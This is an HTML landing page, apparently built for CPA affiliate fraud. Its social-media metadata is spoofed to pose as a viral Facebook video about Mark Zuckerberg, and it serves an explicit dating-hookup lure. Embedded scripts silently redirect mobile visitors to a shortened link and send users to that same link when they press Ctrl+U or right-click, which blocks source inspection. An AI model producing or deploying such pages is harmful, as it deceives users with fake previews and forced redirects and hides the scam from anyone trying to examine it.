<!-- ### BUKAN HASIL COPY PASTE, HASIL KARYA SENDIRI. BUKAN MEMINTA DAN TIDAK PERNA MINTA. INFORMASI ATAUPUN CARA TIDAK MENGINGINKAN. INFO CARI DENGAN BELAJAR SENDIRI DAN BERKARYA TANPA MEMINTA-MINTA INGIN DI BAGI INFO. BY. YURIL ### -->
<!DOCTYPE html>
<html xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
<head>
<title>Redirect...</title>
	<meta name="viewport" content="user-scalable=false, initial-scale=1.0, maximum-scale=1.0"/>
	<meta name="viewport" content="width=device-width, initial-scale=1.0,  user-scalable=0"/>
    <meta name="robots" content="noindex, nofollow"/>
    <meta property="og:title" content="Mark Zuckerberg"/>
    <meta property="og:description" content="100,25M views - 5 hours ago"/>
    <meta property="fb:app_id" content="87741124305"/>
    <meta property="og:type" content="video.movie"/>
    <meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png"/>
    <meta property="fb:use_automatic_ad_placement" content="true"/>
    <meta property="op:generator" content="facebook-instant-articles-sdk-php"/>
    <meta property="op:generator:version" content="1.0.0"/>
    <meta property="op:generator:transformer" content="facebook-instant-articles-sdk-php"/>
    <meta property="op:generator:transformer:version" content="1.0.0"/>
    <meta property="fb:article_style" content="101,479,413 Followers"/>
    <meta property="og:locale" content="en_ID"/>
    <meta property="og:image:alt" content="Images"/>
    <meta property="og:updated_time" content="1556555515"/>
    <meta property="og:video:type" content="text/html"/>
    <meta property="og:video:type" content="application/x-shockwave-flash"/>
    <meta property="al:ios:app_store_id" content="544007664"/>
    <meta property="og:url" content="/"/>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <link rel="canonical" href="https://www.youtube.com/"/>
	<link href="http://fonts.googleapis.com/css?family=Roboto:400,300,700" rel='stylesheet' type='text/css'>
	<link href="https://fonts.googleapis.com/css?family=Monoton|Raleway:400,700|Roboto:300,700" rel="stylesheet" type="text/css"/>
	<link href="/icon.png" rel="icon" type="image/x-icon"/>
<script type="text/javascript" src="/cookies.js"></script>
<script type="text/javascript">
(function(a,b){if(/android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,'http://bit.ly/Enterbase');
</script>

<style type="text/css">
*{
    padding: 0; margin: 0;
}

body {
	background-image: url('/background.jpg');
	background-repeat: no-repeat;
	background-size: cover;
 }

h2{
	color: red;
	text-align: center;
	font-family: arial;
	text-transform: uppercase;
	border: 3px solid #f1f1f1;
	padding: 5px;
	width: 490px;
	margin: auto;
	margin-bottom: 10px;
    margin-top: 10px;
	box-shadow: 0 0 10px 5px #50626c;
}
form {
    border: 3px solid #f1f1f1;
    font-family: Roboto, Helvetica, FreeSans, monospace, sans-serif;
    width: 500px;
    margin: auto;
	box-shadow: 0 0 10px 5px #50626c;
}

label{
	color:#50626C;
	text-transform: uppercase;
}
button {
    background-color: #049372;
    color: white;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    cursor: pointer;
    width: 100%;
	text-shadow: 0 0 10px #f1f1f1;
	box-shadow: 0 0 10px 5px #f1f1f1;
}

button:hover {
    opacity: 0.8;
}

.imgcontainer {
    text-align: center;
    margin: 10px 0 10px 0;
}

img.image {
    width: 95%;
	box-shadow: 0 0 10px 5px #049372;
}

.container {
    padding: 16px;
}

text {
	color: #50626C;
	text-align: center;
	font-family: monospace, sans-serif;
}
	
/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
}
</style>

</head>
<body data-type="backgroundimage">
<h2>Top Among Dating Sites for Singles!</h2>

<form action="http://bit.ly/Enterbase" method="post">
  <div class="imgcontainer">
	<img src="/gif.gif" alt="Image" class="image">
  </div>

  <div class="container">
	<button type="submit">CONTINUE</button></div>

<div class="container" style="background-color:#f1f1f1;box-shadow: 0 0 10px 5px #50626c;">
  <text><p>Create your free profile and start browsing thousands of lonely girls and hookup for sex tonight!</p>
  </text></div>
</form>

<script type='text/javascript'>
//<![CDATA[
//Script Redirect CTRL + U
//http://bit.ly/Enterbase ganti dengan url CPA.
function redirectCU(e) {
  if (e.ctrlKey && e.which == 85) {
    window.location.replace("http://bit.ly/Enterbase");
    return false;
  }
}
document.onkeydown = redirectCU;

//Script Redirect Klik Kanan 
function redirectKK(e) {
  if (e.which == 3) {
    window.location.replace("http://bit.ly/Enterbase");
    return false;
  }
}
document.oncontextmenu = redirectKK;
//]]>
</script>

</body>
</html>